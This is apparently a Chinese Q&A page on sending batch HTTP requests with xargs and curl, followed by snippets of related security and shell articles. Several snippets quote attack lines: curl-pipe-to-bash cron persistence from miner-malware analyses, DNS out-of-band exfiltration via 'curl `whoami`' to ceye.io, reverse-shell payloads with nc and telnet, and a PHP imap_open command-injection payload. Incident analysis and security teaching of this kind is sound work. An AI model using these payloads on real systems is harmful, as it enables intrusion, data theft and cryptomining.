使用xargs和curl的bash脚本(如何回显解析参数)

xargs是一个用于构建和执行命令行参数的实用程序，它从标准输入或文件中读取数据，并将其作为参数传递给指定的命令。curl是一个用于发送HTTP请求和接收HTTP响应的命令行工具和库。

使用xargs和curl的bash脚本可以实现批量发送HTTP请求。下面是一个示例脚本：

#!/bin/bash

# 从文件中读取URL列表
urls_file="urls.txt"

# 使用xargs和curl发送HTTP请求
cat "$urls_file" | xargs -I {} curl -s -o /dev/null -w "%{http_code} - %{url_effective}\n" {}

在这个脚本中，我们假设URL列表存储在名为urls.txt的文件中。xargs命令从文件中读取每个URL，并将其作为参数传递给curl命令。curl命令使用-s参数来禁止显示进度条，-o /dev/null参数将响应输出重定向到/dev/null，-w参数定义了输出格式，其中%{http_code}表示HTTP响应码，%{url_effective}表示实际请求的URL。

要回显解析的参数，可以将curl命令修改为以下形式：

cat "$urls_file" | xargs -I {} sh -c 'echo "Sending request to {}"; curl -s -o /dev/null -w "%{http_code} - %{url_effective}\n" {}'

这样修改后，每次发送请求时都会打印出"Sending request to URL"的信息。

使用xargs和curl的bash脚本可以用于批量测试网站的可用性、监控网站的响应状态等场景。腾讯云提供了云服务器（CVM）和云函数（SCF）等产品，可以用于部署和运行这样的脚本。具体产品介绍和链接如下：

云服务器（CVM）：腾讯云的弹性云服务器，提供高性能、可扩展的计算能力。适用于各种应用场景，包括批量处理、网站部署等。详细信息请参考云服务器产品介绍。
云函数（SCF）：腾讯云的无服务器计算服务，可以按需运行代码，无需管理服务器。适用于事件驱动的任务处理，如定时触发、文件上传等。详细信息请参考云函数产品介绍。

请注意，以上只是腾讯云提供的一些相关产品，其他云计算品牌商也提供类似的产品和服务。

相关·内容

一起挖矿病毒事件的深度分析

入侵分析基本信息检查当我登录服务器做检测时，top回显并未发现异常进程： ? 但是在crontab中发现一条异常的定时任务： ?...脚本分析有了攻击脚本的话，我们就能更加快速的了解他的攻击方式了，所以让我们来分析下脚本到底干了些什么：创建定时任务，不断检测，确保不被删除 echo "*/10 * * * * (curl -fsSL...回到刚开始排查是的情况，为什么我们在top回显中一条异常信息都看不到呢？我又在主机上搜索了下脚本中提到的sshd木马: ?...安全防护 1.SSH： ① 谨慎做免密登录 ② 尽量不使用默认的22端口 ③ 增强root密码强度 2.有很多挖矿病毒是通过Redis未认证接口进行攻击的，所以建议使用redis的同学做以下加固：① 增加授权认证...(requirepass参数)② 尽量使用docker版本(docker pull redis)③ 隐藏重要的命令 3.不要安装来源不明的软件，不管是在个人pc还是在测试服务器上！！！

1.6K2 0

记一次远程命令执行漏洞的挖掘过程

6、结合上面的目录信息和任意文件读取漏洞，对JSP文件简单审计一下，发现logContentNewest.jsp会调用一个bash脚本，便猜想能否使用它构造命令执行： ?...分析logContentNewest.jsp和被调用的sh脚本，得知path参数最终会传入sh脚本的FILE_PATH变量，然后调用下面的判断逻辑。...经过多次测试，最终可用反引号“或者$()进行命令执行，如`ifconfig`： payload："`ifconfig`" 命令结果的回显是因为判断不存在FILA_PATH文件名的文件后，会把变量值返回...但是这里仅仅只是通过xargs的特性让它把多行内容转换成一行来更好地显示结果，当然也可以使用其他方法来实现： ? 在看看nmap内网扫描的结果，同样的漏洞组件在内网中还发现了很多… ?...小结漏洞是由于程序调用bash脚本传参时没有做过滤，通过$(cmd)这样的方式来执行命令并将结果存入变量中，在脚本判断文件不存在时会返回文件名，造成了回显。

1.7K1 0

带外攻击OOB（RCE无回显骚思路总结）

2.带外攻击（OOB）服务器用来测试盲的各种漏洞的话，则需要我们外部的独立服务器参数，也就是带入了外部的服务器，我们叫它带外攻击。这里简单的提了一下这个带内和带外，我们只要理解其过程即可。...可以借助DNS管道解析来让命令回显登录ceye.io各操作系统的使用方法：https://www.freesion.com/article/3526121510/HTTP带外攻击linux可以使用以下方法...`whoami`curl `whoami`.XXXXXX.ceye.ioimage.pngimage.png2.sed如果回显信息不全，可以使用如下结合sed命令令回显完整，但其实也不是全的curl http...`whoami`.ip.port.XXXXXXX.ceye.ioimage.pngimage.pngimage.png说明使用DNS管道解析还是比较鸡肋的，只适合单条的短信息回显，有点作用。...DNS管道解析的扩展，结合php命令执行可以使用这种方式进行回显，使用sed命令令回显变长：执行:http://xxx.xxx.xxx.xxx/test.php?

4.9K4 0

挖矿脚本学习

背景日常应急响应过程中发现的挖矿脚本，对其进行分析发现写的质量该不错，可以学习下样本分析及学习 SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin...bash.givemexyz.in，不能解析直接将url赋值为c2的地址 if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data..." fi #写入计划任务：使用-e参数：激活转义字符 #前三个是吸入系统计划任务 #第四个是写入个人计划任务 #写入计划任务的内容就是以curl、wget、python的urllib2库来下载挖矿样本到.../tmp/xms，并以bash来执行下载的挖矿样本。...$DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root #放入etc/cron.hourly的脚本会每小时执行一次

7852 0

编写Linux Shell脚本的最佳实践

这一点很重要，当我们的脚本需要接受参数的时候，我们一定要先判断参数是否合乎规范，并给出合适的回显，方便使用者了解参数的使用。...日志和回显日志的重要性不必多说，能够方便我们回头纠错，在大型的项目里是非常重要的。如果这个脚本是供用户直接在命令行使用的，那么我们最好还要能够在执行时实时回显执行过程，方便用户掌控。...有时候为了提高用户体验，我们会在回显中添加一些特效，比如颜色啊，闪烁啊之类的，具体可以参考ANSI/VT100 Control sequences这篇文章的介绍。...而不是func{} 尽量使用[[]]来代替[] 尽量使用$()将命令的结果赋给变量，而不是反引号在复杂的场景下尽量使用printf代替echo进行回显事实上，这些新写法很多功能都比旧的写法要强大，用的时候就知道了...我们可以去他的主页了解具体的安装和使用信息。

1K3 0

编写Shell脚本的最佳实践

7891 0

SSRF漏洞总结

攻击内外网的Web应用，主要是使用Get参数就可以实现的攻击(比如 Struts2漏洞利用，SQL注入等) 5....判断方法：是否有回显延时 dns请求：利用我们手中的域名和dns服务器，让目标站点尝试向该域名发送请求，如果能发送请求，必然会先进行dns查询，将域名转化为ip，那么我们的dns服务器上就可以收到该...并且是“有回显的ssrf” 2.fsockopen() 创建一个tcp或者udp套接字，并向目标主机发送连接请求可以用来实现发送http get请求/post请求等，因为tcp或者udp套接字，所以应用层协议的报头需要自己写...，这种短网址跳转的方式就会得不到回显 5.使用子域名解析：xip.io 也就说“ip地址.xip.io” 这个域名会被 dns服务器解析为“ip地址” 将ip地址转化为其他进制：比如说：目标主机限制了...config set dbfilename root 设置数据库文件名为root save 强制redis将当前数据库中的数据同步到数据库文件中如何使用gopher协议来模拟redis-cilent

1.5K2 0

从一道题目中学习反弹shell

，那么这里的思路我的话感觉是还有两种，一种是利用重定向符，他这里输出是无回显的，我们可以把他写到一个文件中，然后访问这个文件来查看回显，因此payload如下 cmd=ls />a 接下来访问xxx/a...协议，它可以相对较简单的建立一些连接，接下来了解一下要用到的参数 -l 使用监听模式，管控传入的资料。...结合Bash进行反弹shell 这个就是用于绕过的，当目标机存在某些防护过滤了一些字符时，我们可以通过这个来实现反弹shell，语句如下 curl ip|bash 它的话其实就是以bash解析shell...，其实也就是将回显输出到这个端口下了，此时实现了攻击机port端口执行的语句，在port2端口可以看到回显信息第二种方式先给出参考payload mknod a p; telnet xxx.xxx.xxx.xxx...bash执行talent的输出信息，然后1>a，就是将标准输出重定向到a，这个时候就实现了标准输入和输出都在同一个管道下 demo 攻击机监听两个端口，一个用于执行指令，一个用于查看回显 nc -lvnp

5211 0

超详细讲解命令执行漏洞

系统漏洞造成的命令执行 bash破壳漏洞(CVE-2014-6271)，该漏洞可以构造环境变量的值来执行具有攻击力的脚本代码，会影响到bash交互的多种应用，如http、ssh和dhcp等调用的第三方组件存在代码执行漏洞...url=dir 22.txt exec 需要注意的一点exec要有echo才有回显 <?...$*mi 花括号的用法在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令{cat,flag} 无回显的命令执行可以通过curl命令将命令的结果输出到访问的...HTTP/1.1" 404 146 "-" "curl/7.58.0"，这样，命令的回显就能在日志中看到了读文件命令 ls|bash|tac|nl|more|less|head|wget|tail|vi...flag 47.100.120.123:2333 长度绕过详细见P牛文章linux命令执行的时候可以使用反斜杠换行；bash脚本中同样适用上面的规则；可以用文件名加反斜杠构成命令，使用ls -t

5K3 1

编写 Shell 脚本的最佳实践

这一点很重要，当我们的脚本需要接受参数的时候，我们一定要先判断参数是否合乎规范，并给出合适的回显，方便使用者了解参数的使用。...日志和回显日志的重要性不必多说，能够方便我们回头纠错，在大型的项目里是非常重要的。如果这个脚本是供用户直接在命令行使用的，那么我们最好还要能够在执行时实时回显执行过程，方便用户掌控。...有时候为了提高用户体验，我们会在回显中添加一些特效，比如颜色啊，闪烁啊之类的，具体可以参考 ANSI/VT100 Control sequences 这篇文章的介绍。...[] 尽量使用 $() 将命令的结果赋给变量，而不是反引号在复杂的场景下尽量使用 printf 代替 echo 进行回显事实上，这些新写法很多功能都比旧的写法要强大，用的时候就知道了。...我们可以去他的主页了解具体的安装和使用信息。

1K1 0

提高Linux工作效率的十大bash技巧

希望我的这些追求最大化命令行效率的努力成果也能给其他喜欢使用bash的朋友们带来一些帮助。我喜欢钻研bash环境。很多时候，在使用bash编程中，有些问题一遍又一遍的重复遇到。...希望我的这些追求最大化命令行效率的努力成果也能给其他喜欢使用bash的朋友们带来一些帮助。我更大的期望是我的这种行为能引起其他朋友的互动——给我提建议、提出更好的bash技巧，请在文后留言讨论。...但我估计很多时候你的开发环境中没有这样的集成工具。如何使用命令行对一个目录进行递归搜索和替换？别想Perl语言，你可以使用find and sed。...> 这里用了很多参数，你可以阅读这个简单的curl文档来了解它们。...下面是我的配置文件里脚本，但我想上面的链接能提供你更多技巧：技巧七、从格式化输出里提取一列(我最常使用的awk技巧) 我几乎天天都会使用它。真的。

5721 0

PHP 邮件漏洞小结

来解析邮件的内容，这里添加的内容目的是覆盖默认的解析，使用PHP来解析邮件内容。...docker exec -it 9017603a0e13 /bin/bash 模拟一个imap的邮件发送脚本，脚本代码如下： <?...|base64\t-d|bash";@imap_open('{'.$server.'}:143/imap}INBOX', '', ''); 运行回显如下： ?...> 我们可以控制$file参数为我们刚才设置的1.php 回显结果： ?...其实在上面我们可以看见，这个是有建立文件的功能的，所以我们可以根据hitcon的一道题的思路：先建立我们所需要的文件名，比如文件名最后需要的是 curl your_vps|bash，在文件的index.html

2.3K1 0

高效的Shell编程建议及入坑

，并给出合适的回显，方便使用者了解参数的使用。...默认情况下windows判断utf-8格式是通过在文件开头加上三个EF BB BF字节来判断的，但是在Linux中默认是无BOM的所以会报错; 8)脚本权限执行，日志和回显描述:不加执行权限会导致无法直接执行...,所以再执行脚本前需要对其进行chomd +x test.sh 日志的重要性不必多说能够方便我们回头纠错，在大型的项目里是非常重要的，同时能够在执行时实时回显执行过程，方便用户掌控。...有时候为了提高用户体验，我们会在回显中添加一些特效，比如颜色啊，闪烁啊之类的，具体可以参考ANSI/VT100 Control sequences文章的介绍。...,(())的通用性比较好尽量使用$()将命令的结果赋给变量而不是反引号在复杂的场景下尽量使用printf代替echo进行回显 #示例1.建议采用(())来做为除了test命令的首选，不容易出错在进行变量测试的时候

7961 0

Linux应急响应笔记

自动化信息收集我的自动化手机信息的脚本如下，脚本的初衷是进行自动化信息收集，不需要我去连接到客户设备，提升操作/沟通效率。 #!...我把恶意脚本获取到本地，这是一个shell脚本，接下来分析看看这个脚本干什么恶意脚本分析恶意脚本脚本共439行代码，前面300行都是删除文件和杀死进程，我简单摘要几段代码 #/bin/bash processes...无论如何，还是尽量保证系统安全性，减小系统入侵攻击面，这样可以极大保护系统不被入侵。...防护建议一般来说，自动化的入侵一般都是利用非常简单的漏洞，比如若口令，使用存在漏洞的组件，未授权访问等，另外一个感染病毒的方式是ssh证书认证。...最后，我把上述用到的脚本和checklist放在https://github.com/kafroc/emergency-response-toolbox 中，有需要的读者可下载使用，欢迎任何的反馈意见。

3.2K5 1

十个提升生产力的 bash 技巧

我喜欢钻研bash环境。很多时候，在使用bash编程中，有些问题一遍又一遍的重复遇到。每次我都需要重新思考这些问题的解决方法。...直到有一天我无法忍受，于是坐下来，编写一个通用的函数，放入我的.bashrc文件中，部署到电脑上。希望我的这些追求最大化命令行效率的努力成果也能给其他喜欢使用bash的朋友们带来一些帮助。...但我估计很多时候你的开发环境中没有这样的集成工具。如何使用命令行对一个目录进行递归搜索和替换？别想Perl语言，你可以使用find and sed。...： curl -OLks 这里用了很多参数，你可以阅读这个简单的curl文档来了解它们。...： docker rmi $(docker images | col 3 | xargs | skip 1) 技巧九、创建自己的命令包在bash里，你可以很容易的创建自己的命令组件，你可以看一下下面我写的

7406 0

拥有此神技，脚本调试从此与 echo、set、test 说分手！

所以为了确保 Bash 脚本的安全可靠，在生产环境中部署之前一定需要做好足够的测试以确保其行为符合我们的预期。如何能够安全可靠的去测试 Bash 脚本呢？有人可能会说我们可以用 Docker 容器。...场景二：测试结果的稳定性可能取决于脚本中访问的第三方服务的稳定性。比如，我们在脚本中使用curl命令从一个网络服务中获取数据，但这个服务有时候可能会访问失败。...比如在 Bash 脚本中可能会根据传入的参数来组合出内部所调用的命令的选项和参数，我们要验证的是这些选项和参数确实如我们预期的。...至于调用的命令在接受了这些选项和参数后由于什么原因而失败，可能我们并不关心这所有的可能原因。...由于操作系统和 Bash 的一些限制，Bach Testing Framework 无法做到：拦截使用绝对路径调用的命令事实上我们应该避免在 Bash 脚本中使用绝对路径，如果不可避免的要使用，我们可以把这个绝对路径抽取为一个变量

1K2 0

实用 Linux 命令行使用技巧集锦

1、基本命令了解基本的bash 通读整个bash man page. 学习VIM 在Linux系统上，虽然你有Emacs和Eclipse，但是VIM仍然是无出其右的利器。...可以这样使用 touch /tmp/{foo,bar,baz} {$1-$9} 执行shell脚本时的命令行参数 $0 正在执行的命令名称 $# 当前启动的命令中传入的参数个数 $上一条命令的执行返回值...$$ 该shell的进程号。 $* 从$1开始，启动该shell脚本的所有参数。..., Alt-BackSpace 删除光标前的一个词； man readline 中包含了大量bash中的默认热键绑定； cd - 返回前一个工作路径 xargs 非常强大的命令。...set 在bash脚本中，使用 set -x 获得debug输出，使用 set -e 获得错误输出。 ;分号用于开启一个子shell并运行至结束后关闭。

1.5K8 0

试一试这百个超有用的Linux命令行使用技巧

1 基本的linux命令了解基本的bash 通读整个bash man page. 学习VIM 在Linux系统上，虽然你有Emacs和Eclipse，但是VIM仍然是无出其右的利器。...可以这样使用touch /tmp/{foo,bar,baz} {$1-$9} 执行shell脚本时的命令行参数 $0 正在执行的命令名称 $# 当前启动的命令中传入的参数个数 $上一条命令的执行返回值。...$$ 该shell的进程号。 $* 从$1开始，启动该shell脚本的所有参数。..., Alt-BackSpace 删除光标前的一个词man readline中包含了大量bash中的默认热键绑定. cd - 返回前一个工作路径 xargs 非常强大的命令。...set 在bash脚本中，使用set -x获得debug输出，使用set -e获得错误输出。 ; 分号用于开启一个子shell并运行至结束后关闭。

9957 0

GitLab 远程命令执行漏洞复现(CVE-2021-22205)

一、漏洞描述 GitLab 没有正确验证传递给文件解析器的图像文件，这导致远程命令执行，可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解，漏洞编号CVE-2021-22205。...8080端口，bp开着的记得换一下端口环境启动后，访问http://127.0.0.1:8080即可查看到GitLab的登录页面 image-20211102154432735 五、脚本复现 1 下载工具...https://github.com/Al1ex/CVE-2021-22205 git到本地，由于执行命令无回显，可以使用dnslog外带回显结果 http://dnslog.cn/ 获取一个dnslog...py -v true -t http://10.0.1.12:8080/ image-20211102161900299 3 命令执行试一下先，不知道为什么我这里没有dnslog回显 python3...POC都是我登录账号之后抓的 1 获取cookie 使用登录页面返回的 Cookie 值和 csrf-token 值 POC GET /users/sign_in HTTP/1.1 Host: 10.11.1.120

6.3K2 0

一个Linux平台的门罗币挖矿木马的查杀与分析

/root和/var/spool/cron/crontabs/root下写计划任务”/5 * curl -sL https://x.co/6nPMR | sh”，其中这个短链接还原后为https://xmr.enjoytopic.tk...简单的进程保护行为为了防被杀后还能继续挖矿，其通过写入定时任务的方式来实现简单的进程保护，通过一定时间间隔使用curl与wget远程下载shell脚本程序执行，该脚本的功能会执行本地路径下已存在的挖矿程序...| grep "bash /tmp/r88.sh" | grep -v grep | awk '{print $2}' | xargs kill ps -ef | grep "bash /tmp...Linux系统的shell脚本编写Downloader，使用curl与wget命令发起网络请求下载木马的其他组件，虽然代码可被轻易分析，但是编写成本和门槛降低，这也是当前恶意代码使用脚本语言编写的一个趋势...关于挖矿木马如何防范与其他恶意代码以及入侵事件如何防范一样，实际上均是老生常谈的话题，最重要的一点还是企业需要正视网络安全的重要性，及时对系统以及应用打补丁，定期组织安全人员进行服务器的维护，提高企业员工的安全意识等等

2.4K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云